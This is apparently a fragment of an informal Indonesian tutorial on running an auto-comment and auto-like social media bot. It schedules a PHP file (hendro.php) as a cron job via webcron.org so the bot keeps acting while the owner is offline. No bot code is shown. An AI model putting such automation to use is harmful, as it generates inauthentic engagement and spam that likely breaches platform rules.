lalu pilih file php tadi yang namanya hendro.php <script botnya masukkin di cronjob PERINTAH YANG AKAN DIJALANKAN : public_html/hendro.php lalu settings waktunya


dah gitu aja dah jalan tuh botnya




lalu buat


udah cuma gtu doank..JALAN DEH AUTO KOMENT MA LIKE NYA HIHIHI WALAUPUN OFFLINE TETEP COMMENT+LIKE



Cronjob Bisa Ssettings Disini : http://Webcron.org




KESIMPULAN


ANAK SD AJA TEMEN GUE BISA MASAK ELU GK BISA :P HIHIHI ^_^